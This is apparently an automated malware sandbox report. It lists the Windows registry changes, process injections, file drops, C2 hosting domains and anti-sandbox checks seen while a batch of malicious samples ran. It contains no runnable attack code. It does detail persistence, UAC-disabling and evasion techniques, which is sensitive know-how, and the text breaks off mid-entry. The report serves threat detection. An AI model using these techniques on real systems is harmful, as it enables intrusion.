description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA qth5kdee.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA wefhrf.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" wefhrf.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA chrome_93.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA updater.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\P: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 15 IoCs
flow ioc 268 raw.githubusercontent.com 735 raw.githubusercontent.com 870 pastebin.com 1206 raw.githubusercontent.com 15 raw.githubusercontent.com 820 raw.githubusercontent.com 864 pastebin.com 899 iplogger.com 1373 pastebin.com 13 raw.githubusercontent.com 898 iplogger.com 1205 raw.githubusercontent.com 1377 pastebin.com 416 bitbucket.org 417 bitbucket.org -
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 886 ip-api.com 1397 checkip.dyndns.org 75 ipinfo.io 77 ipinfo.io 421 ip-api.com 732 ip-api.com -
pid Process 3804 cmd.exe 5948 ARP.EXE -
Power Settings 1 TTPs 13 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 5068 powercfg.exe 3128 powercfg.exe 6820 powercfg.exe 7312 powercfg.exe 1436 powercfg.exe 2204 powercfg.exe 8968 powercfg.exe 2124 cmd.exe 4540 powercfg.exe 3640 powercfg.exe 3256 powercfg.exe 7308 powercfg.exe 4936 powercfg.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0007000000023d23-2189.dat autoit_exe -
Boot or Logon Autostart Execution: Authentication Package 1 TTPs 1 IoCs
Suspicious Windows Authentication Registry Modification.
description ioc Process Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800630031003300360030003600660065003900300030003900660031003100640029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000 msiexec.exe -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\explorer.exe explorer.exe File opened for modification C:\Windows\SysWOW64\explorer.exe svchost.exe File opened for modification C:\Windows\system32\MRT.exe chrome_93.exe File opened for modification C:\Windows\system32\MRT.exe xdd.exe -
Enumerates processes with tasklist 1 TTPs 10 IoCs
pid Process 680 tasklist.exe 1924 tasklist.exe 3852 tasklist.exe 2804 tasklist.exe 5324 tasklist.exe 396 tasklist.exe 840 tasklist.exe 2068 tasklist.exe 5612 tasklist.exe 1868 tasklist.exe -
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
pid Process 5464 cmd.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 2592 qth5kdee.exe 3152 %E8%88%9E%E8%B9%88%E5%8A%A9%E6%89%8B.exe 6700 chrome_93.exe 7668 updater.exe -
Suspicious use of SetThreadContext 23 IoCs
description pid Process procid_target PID 2140 set thread context of 708 2140 yiklfON.exe 124 PID 3252 set thread context of 4220 3252 tester.exe 134 PID 944 set thread context of 3552 944 Paraguay.pif 140 PID 2180 set thread context of 2372 2180 Blsvr.exe 153 PID 4376 set thread context of 4328 4376 H8hsp6zrMtJI2hC.exe 169 PID 876 set thread context of 3524 876 winupsecvmgr.exe 210 PID 876 set thread context of 2028 876 winupsecvmgr.exe 211 PID 4168 set thread context of 1504 4168 alex2022.exe 229 PID 2732 set thread context of 3576 2732 remcos.exe 314 PID 3556 set thread context of 5652 3556 needmoney.exe 325 PID 2628 set thread context of 5588 2628 pyexec.exe 323 PID 6076 set thread context of 4348 6076 ufw.exe 344 PID 3968 set thread context of 4412 3968 GoogleUpdate.exe 434 PID 4996 set thread context of 5184 4996 armadegon.exe 427 PID 1680 set thread context of 2744 1680 Possibly.pif 468 PID 5776 set thread context of 5824 5776 remcos.exe 577 PID 3940 set thread context of 5992 3940 GREENpackage.exe 613 PID 6732 set thread context of 6964 6732 Opdxdyeul.exe 705 PID 1764 set thread context of 7496 1764 bqkriy6l.exe 729 PID 6392 set thread context of 6164 6392 zq6a1iqg.exe 732 PID 5976 set thread context of 6660 5976 bkujn.exe 753 PID 9188 set thread context of 6156 9188 bkujn.exe 800 PID 6224 set thread context of 9176 6224 bkujn.exe 843 -
resource yara_rule behavioral1/files/0x0008000000023cfe-1824.dat upx -
Drops file in Program Files directory 21 IoCs
description ioc Process File created C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.WindowsClient.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.WindowsFileManager.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.WindowsFileManager.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\app.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\Client.Override.en-US.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.Core.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.WindowsAuthenticationPackage.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.WindowsBackstageShell.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\Client.Override.resources msiexec.exe File created C:\Program Files\Google\Chrome\Application\ZZWJ0PS30NZECMN1L7UMRQE.exe RegAsm.exe File created C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.ClientService.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\web.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.Client.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.Windows.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.WindowsCredentialProvider.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.WindowsBackstageShell.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.WindowsClient.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\Client.en-US.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.ClientService.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\Client.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\system.config msiexec.exe -
Drops file in Windows directory 30 IoCs
description ioc Process File opened for modification C:\Windows\Installer\e5f0299.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI9BE.tmp msiexec.exe File opened for modification C:\Windows\CameroonBuses ConsiderableWinners.exe File opened for modification C:\Windows\BackedIma ConsiderableWinners.exe File created C:\Windows\Installer\{80530F48-9896-FE66-A2AB-CD9170769313}\DefaultIcon msiexec.exe File opened for modification C:\Windows\PossessDescriptions ConsiderableWinners.exe File created C:\Windows\sysnldcvmr.exe 2863614952.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File created C:\Windows\Installer\e5f029b.msi msiexec.exe File opened for modification \??\c:\windows\resources\themes\explorer.exe icsys.icn.exe File created C:\Windows\Tasks\Gxtuum.job nothjgdwa.exe File created C:\Windows\Tasks\Hkbsse.job Nework.exe File opened for modification C:\Windows\Installer\MSID69.tmp msiexec.exe File opened for modification C:\Windows\ConsolidationDistinct ConsiderableWinners.exe File created C:\Windows\Installer\e5f0299.msi msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSI6CF.tmp msiexec.exe File opened for modification C:\Windows\FlickrRealm ConsiderableWinners.exe File created C:\Windows\Tasks\Dctooux.job 8fc809.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Tasks\ednfosi.job armadegon.exe File opened for modification C:\Windows\Resources\Themes\icsys.icn.exe injector.exe File created C:\Windows\Installer\SourceHash{80530F48-9896-FE66-A2AB-CD9170769313} msiexec.exe File created C:\Windows\Installer\wix{80530F48-9896-FE66-A2AB-CD9170769313}.SchedServiceConfig.rmi MsiExec.exe File created C:\Windows\Tasks\Test Task17.job Opdxdyeul.exe File created C:\Windows\sysnldcvmr.exe 3188116601.exe File opened for modification C:\Windows\sysnldcvmr.exe 3188116601.exe File opened for modification C:\Windows\Installer\{80530F48-9896-FE66-A2AB-CD9170769313}\DefaultIcon msiexec.exe File opened for modification \??\c:\windows\resources\spoolsv.exe explorer.exe File opened for modification \??\c:\windows\resources\svchost.exe spoolsv.exe -
Launches sc.exe 27 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4728 sc.exe 7844 sc.exe 2480 sc.exe 4188 sc.exe 1188 sc.exe 6644 sc.exe 1456 sc.exe 1044 sc.exe 3992 sc.exe 4828 sc.exe 8140 sc.exe 7184 sc.exe 4276 sc.exe 5624 sc.exe 576 sc.exe 5128 sc.exe 5884 sc.exe 7176 sc.exe 3108 sc.exe 3956 sc.exe 5888 sc.exe 5424 sc.exe 748 sc.exe 2104 sc.exe 9204 sc.exe 7012 sc.exe 6284 sc.exe -
Detects Pyinstaller 4 IoCs
resource yara_rule behavioral1/files/0x0007000000023c8f-624.dat pyinstaller behavioral1/files/0x000500000001e4d2-1444.dat pyinstaller behavioral1/files/0x0009000000023d3b-2445.dat pyinstaller behavioral1/files/0x0007000000022df9-3490.dat pyinstaller -
Embeds OpenSSL 3 IoCs
Embeds OpenSSL, may be used to circumvent TLS interception.
resource yara_rule behavioral1/files/0x000500000001e5bc-482.dat embeds_openssl behavioral1/files/0x0007000000023cea-1545.dat embeds_openssl behavioral1/files/0x000a000000023d7a-2878.dat embeds_openssl -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
Program crash 48 IoCs
pid pid_target Process procid_target 4868 4468 WerFault.exe 242 5160 1468 WerFault.exe 376 4016 5644 WerFault.exe 418 5668 5976 WerFault.exe 409 5252 2384 WerFault.exe 628 7564 2384 WerFault.exe 628 7604 2384 WerFault.exe 628 7948 2384 WerFault.exe 628 7160 2384 WerFault.exe 628 8132 2384 WerFault.exe 628 6824 2384 WerFault.exe 628 7128 2384 WerFault.exe 628 8120 2384 WerFault.exe 628 6980 2384 WerFault.exe 628 6868 6884 WerFault.exe 686 5280 6884 WerFault.exe 686 6632 6884 WerFault.exe 686 6568 6884 WerFault.exe 686 4204 6884 WerFault.exe 686 6544 6884 WerFault.exe 686 6980 6884 WerFault.exe 686 4832 6884 WerFault.exe 686 6296 6884 WerFault.exe 686 6220 6884 WerFault.exe 686 3384 6884 WerFault.exe 686 6500 6884 WerFault.exe 686 7592 6884 WerFault.exe 686 7364 6884 WerFault.exe 686 5708 6884 WerFault.exe 686 5336 6884 WerFault.exe 686 7556 6884 WerFault.exe 686 2876 7612 WerFault.exe 736 7212 9076 WerFault.exe 776 9184 6884 WerFault.exe 686 7080 8092 WerFault.exe 831 1272 6884 WerFault.exe 686 5208 6884 WerFault.exe 686 1408 6884 WerFault.exe 686 8732 6184 WerFault.exe 910 8208 6884 WerFault.exe 686 8660 6264 WerFault.exe 8892 6884 WerFault.exe 686 6512 5836 WerFault.exe 968 5708 6884 WerFault.exe 686 7792 5696 WerFault.exe 994 9396 6884 WerFault.exe 686 6032 6556 WerFault.exe 1010 7568 2672 WerFault.exe 500 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Nework.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4363463463464363463463463.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1487620755.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Dctooux.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bkujn.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sysnldcvmr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1094014616.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ednfosi.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language kxfh9qhs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ednfosi.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Hkbsse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language %E8%88%9E%E8%B9%88%E5%8A%A9%E6%89%8B.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language szo0xbx8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tdrpload.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tn8cdkzn.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language H8hsp6zrMtJI2hC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tester.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language q1wnx5ir.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language iexplore.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3188116601.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language s.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ScreenConnect.ClientService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ConsiderableWinners.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ATLEQQXO.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language systeminfo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MYNEWRDX.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ChatLife.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 864131738.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TPB-1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language yiklfON.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language JJSploit_8.10.7_x64-setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tester.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3dismhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7cl16anh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vorpgkadeg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sysnldcvmr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pfntjejghjsdkr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ednfosi.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 5004 cmd.exe 5708 netsh.exe -
System Network Connections Discovery 1 TTPs 1 IoCs
Attempt to get a listing of network connections.
pid Process 3452 NETSTAT.EXE -
NSIS installer 4 IoCs
resource yara_rule behavioral1/files/0x0007000000023d05-1966.dat nsis_installer_1 behavioral1/files/0x0007000000023d05-1966.dat nsis_installer_2 behavioral1/files/0x0009000000023d1b-2146.dat nsis_installer_1 behavioral1/files/0x0009000000023d1b-2146.dat nsis_installer_2 -
Checks SCSI registry key(s) 3 TTPs 11 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID dwm.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000f914d34881601a250000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000f914d3480000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900f914d348000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1df914d348000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000f914d34800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 dwm.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString TPB-1.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Channel1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Channel1.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 TPB-1.exe -
Collects information from the system 1 TTPs 1 IoCs
Uses WMIC.exe to find detailed system information.
pid Process 1536 WMIC.exe -
Delays execution with timeout.exe 3 IoCs
pid Process 4608 timeout.exe 5544 timeout.exe 2084 timeout.exe -
Enumerates system info in registry 2 TTPs 8 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS dwm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dwm.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
pid Process 3384 ipconfig.exe 3452 NETSTAT.EXE -
Gathers system information 1 TTPs 2 IoCs
Runs systeminfo.exe.
pid Process 3696 systeminfo.exe 5704 systeminfo.exe -
Kills process with taskkill 4 IoCs
pid Process 5824 taskkill.exe 2500 taskkill.exe 6088 taskkill.exe 6832 taskkill.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust dwm.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ScreenConnect.ClientService.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created 